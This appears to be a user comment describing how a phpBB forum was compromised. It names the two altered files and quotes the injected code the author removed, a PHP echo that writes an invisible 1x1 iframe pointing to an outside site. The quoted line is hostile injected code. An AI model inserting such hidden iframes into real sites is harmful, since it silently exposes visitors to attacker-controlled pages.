the attack is same with me..
that happened to my phpBB…
target file (for phpBB):
1. includes/session.php
2. includes/acp/acp_main.php
I still dont know how to secure my phpBB bcoz the version was old.
Im lazy to download n reinstall that phpBB new version…
For temporary, I just fix my phpBB by removing this code in those two files:
echo “<iframe src=\”http://internetcountercheck.com/?click=82845921\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
